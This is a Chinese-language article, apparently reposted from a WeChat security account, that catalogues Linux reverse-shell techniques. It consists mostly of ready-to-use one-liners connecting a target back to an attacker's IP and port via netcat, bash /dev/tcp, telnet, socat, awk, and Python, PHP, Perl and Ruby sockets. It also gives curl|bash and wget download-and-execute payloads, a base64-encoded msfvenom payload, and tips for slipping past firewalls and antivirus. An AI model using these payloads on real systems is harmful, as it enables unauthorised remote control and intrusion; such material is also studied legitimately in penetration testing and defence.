概述
由于防火墙等的控制访问策略,客户端无法访问服务端,但服务端可以向外网发起请求 IP会动态变化,攻击机无法直接连接 向局域网中的主机散播木马病毒等,网络环境未知的情况下 服务端的AV对正向连接的流量检测非常严格,但是对出网流量校验不足
反弹方式
在不同的操作系统中,反弹shell的方式有所不同,这里就先总结Linux的反弹shell思路。
nc -l 9999
在不同的反弹shell方式中,都需要客户端监听,下文将不再赘述,仅讲述不同的反弹方式
nc,前面的端口监听就是使用 Netcat# 目标主机中执行的反弹命令nc Your_IP Your_Port -e /bin/bash
Bash
# payload1bash -i >& /dev/tcp/Your_IP/Your_Port 0>&1# payload2bash -c "bash -i >& /dev/tcp/Your_IP/Your_Port 0>&1"
payload分析
bash -c
后加Linux命令,如:bash -c whoamibash -i
产生一个bash交互环境>&
将联合符号前面的内容与后面相结合,然后一起重定向给后者。/dev/tcp/Your_IP/Your_Port
在Linux中,一切内容皆为文件,这里是与目标主机的指定端口建立一个TCP连接0>&1
将标准输入与标准输出的内容相结合,然后重定向给前面标准输出的内容
Telnet
方法一
mknod a p; telnet Your_IP Your_Port 0<a | /bin/bash 1>a
方法二
nc -l Your_cmd_Portnc -l Your_result_Port
telnet Your_IP Your_cmd_Port | /bin/bash | telnet Your_IP Your_result_Port
此外,在一些工控设备中,常常由 telnetd 程序,也可以利用其来开启正向的shell目标主机开启监听telnetd -p Your_Port -l /bin/sh攻击主机正向连接telnet Your_IP Your_Port
Socat
apt-get install socat
攻击主机开启监听,可以使用原来的nc,也可以一样使用 socat
socat TCP-LISTEN:2333 -
目标主机中触发
socat tcp-connect:Your_IP:Your_Port exec:'bash -li',pty,stderr,setsid,sigint,sane
awk
nc -l 9999
awk 'BEGIN{s="/inet/tcp/0/Your_IP/Your_Listening_Port";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
Curl
# 新建payloadcd /tmpecho 'bash -c "bash -i >& /dev/tcp/Your_IP/Your_Port 0>&1"' > index.html# 开启Web服务python3 -m http.server 80
curl http://Your_IP|bash
TIPS:此处的IP可以是任意的可解析格式,如十进制、十六进制等等,可参考 SSRF 中的IP过滤绕过
wget
wget http://Your_IP -O /tmp/1.sh &&chmod 777 /tmp/1.sh && /tmp/1.sh
脚本反弹shell
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Your_IP",Your_Port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("Your_IP","Your_Port");exec("/bin/sh -i <&3 >&3 2>&3");'
Perl
perl -e 'use Socket;$i="Your_IP";$p=Your_Port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
ruby
ruby -rsocket -e 'c=TCPSocket.new("Your_IP","Your_Port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Metasploit
# 1. 查询payloadmsfvenom -l payloads | grep 'cmd/unix/reverse'# 2. 生成反弹 shell 的 payloadmsfvenom -p cmd/unix/reverse_python LHOST=Your_IP LPORT=Your_Port -f raw# 3. 先开启监听,再将生成的payload在目标主机执行即可Payload size: 517 bytespython -c "exec('aW1wb3J0IHNvY2tldCwgICAgc3VicHJvY2VzcywgICAgb3MgICAgIDsgICAgICAgIGhvc3Q9IjE5Mi4xNjguMS4xIiAgICAgOyAgICAgICAgcG9ydD04MDAwICAgICA7ICAgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgIDsgICAgICAgIHMuY29ubmVjdCgoaG9zdCwgICAgcG9ydCkpICAgICA7ICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksICAgIDApICAgICA7ICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksICAgIDEpICAgICA7ICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksICAgIDIpICAgICA7ICAgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"
进行 Base64 解码后就会发现,生成的就是 Python中的 payload
总结
声明
参考链接https://masterxsec.github.io/2017/07/21/Linux%E5%8F%8D%E5%BC%B9shell%E7%9A%8410%E7%A7%8D%E5%A7%BF%E5%8A%BF/
推荐阅读
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247499310&idx=2&sn=3c11dac4726afb176755a14a7c17bb04&chksm=c04d7910f73af0066adab4055ad6f6514c4c7ff3ffa2846a65432b3720c712560cdf71b1fece#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh